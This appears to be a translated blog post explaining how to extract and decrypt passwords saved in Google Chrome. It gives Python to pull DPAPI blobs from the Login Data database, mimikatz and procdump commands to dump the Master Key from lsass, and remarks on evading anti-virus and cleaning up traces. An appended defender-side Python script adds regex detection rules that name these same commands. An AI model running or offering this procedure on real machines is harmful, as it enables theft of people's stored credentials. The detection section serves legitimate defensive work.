Reading the passwords saved by Google Chrome

Introduction: there are two ways to do this. One uses mimikatz's dpapi module, the other uses the ChromePass tool; each has its own advantages.

Method 1: use mimikatz's dpapi module to obtain the Master Key and decrypt with it

First, some concepts:

DPAPI:
Short for Data Protection Application Programming Interface.

DPAPI blob:
A piece of ciphertext that can be decrypted with the Master Key.

Master Key:
64 bytes, used to decrypt DPAPI blobs. It is encrypted with the user's logon password, the user's SID and a 16-byte random value, and stored in the Master Key file.

Master Key file:
A binary file; decrypting it with the user's logon password yields the Master Key.

Implementation:

1. Use Python to read the Login Data database file and extract the ciphertext

import sqlite3
import binascii

# Chrome keeps Login Data locked while it is running, so copy the file into
# the working directory first and open the copy.
conn = sqlite3.connect('Login Data')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
# password_value is a DPAPI blob in the Chrome versions this post targets.
# The original loop reopened test.txt for every row, so only the last row
# survived; write one file per row instead (test0.txt, test1.txt, ...).
# The following steps work on one of these files and call it test.txt.
for i, result in enumerate(cursor.fetchall()):
    print(binascii.b2a_hex(result[2]))
    with open('test%d.txt' % i, 'wb') as f:
        f.write(result[2])
conn.close()

2. Obtain the corresponding guidMasterkey:
dpapi::blob /in:test.txt


The Master Key file is therefore at %APPDATA%\Microsoft\Protect\%SID%\e7ddf239-ec80-45f7-8892-1a0a90c7d77e

3. Read the Master Key held in lsass; there are two ways

The first: read it online, directly on the target machine:
mimikatz.exe privilege::debug "sekurlsa::dpapi" exit

The second: read it offline. Use procdump to dump the LSASS process memory:
procdump.exe -accepteula -ma lsass.exe lsass.dmp
then read the dump locally:

sekurlsa::minidump lsass.dmp
sekurlsa::dpapi

Note: after mimikatz extracts the Master Key from the lsass process, the key is automatically added to the Master Key System Cache.

Which of the two to use depends on the situation: one gets past anti-virus, the other is faster but leaves traces that have to be cleaned up; each has its own benefits.

4. Decrypt using the Master Key

The Master Key here is: 94ecd8123fbf517a4585f077d172332f5b396f5de7c26bd82bf5951e4b979be24c2692f21048762442f10d4dd8b3daa28ea785846689d08d723bc3a9e86d8224

dpapi::blob /in:test.txt
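As an added defender-side example (not part of the original post), the following Python scans constructed Sysmon-style events for the markers this procedure leaves behind: a full procdump of lsass.exe, mimikatz's sekurlsa::dpapi, sekurlsa::minidump and dpapi::blob sub-commands, and a process other than the browser reading Chrome's Login Data. The event shape and field names are assumptions, not a real log schema.

```python
import re

# Constructed sample telemetry (not real logs). Process-creation events carry
# "cmdline"; file-access events carry "target". The first three mirror the
# steps of the post; the last two are benign.
EVENTS = [
    {"image": r"C:\Tools\procdump.exe",
     "cmdline": "procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"image": r"C:\Tools\mimikatz.exe",
     "cmdline": 'mimikatz.exe privilege::debug "sekurlsa::dpapi" exit'},
    {"image": r"C:\Python37\python.exe",
     "target": r"C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

# Command-line markers: a full (-ma) lsass memory dump via procdump, and the
# mimikatz sub-commands used in steps 2 to 4 above.
CMDLINE_RULES = [
    ("procdump_lsass_full_dump", re.compile(r"procdump(64)?\.exe.*\s-ma\s+lsass\.exe", re.I)),
    ("mimikatz_dpapi", re.compile(r"sekurlsa::(dpapi|minidump)|dpapi::blob", re.I)),
]
# Only the browser itself is expected to open its Login Data database.
BROWSER_IMAGES = {"chrome.exe"}


def classify(event):
    """Return the names of the rules an event triggers (empty list = benign)."""
    hits = [name for name, rx in CMDLINE_RULES if rx.search(event.get("cmdline", ""))]
    target = event.get("target", "").lower()
    image_name = event["image"].rsplit("\\", 1)[-1].lower()
    if target.endswith("\\login data") and image_name not in BROWSER_IMAGES:
        hits.append("non_browser_login_data_read")
    return hits


def scan(events):
    """Map the index of every flagged event to the rules it triggered."""
    flagged = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            flagged[i] = hits
    return flagged


if __name__ == "__main__":
    for i, hits in scan(EVENTS).items():
        print(i, EVENTS[i]["image"], hits)
```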



Source: www.cnblogs.com/zpchcbd/p/11942502.html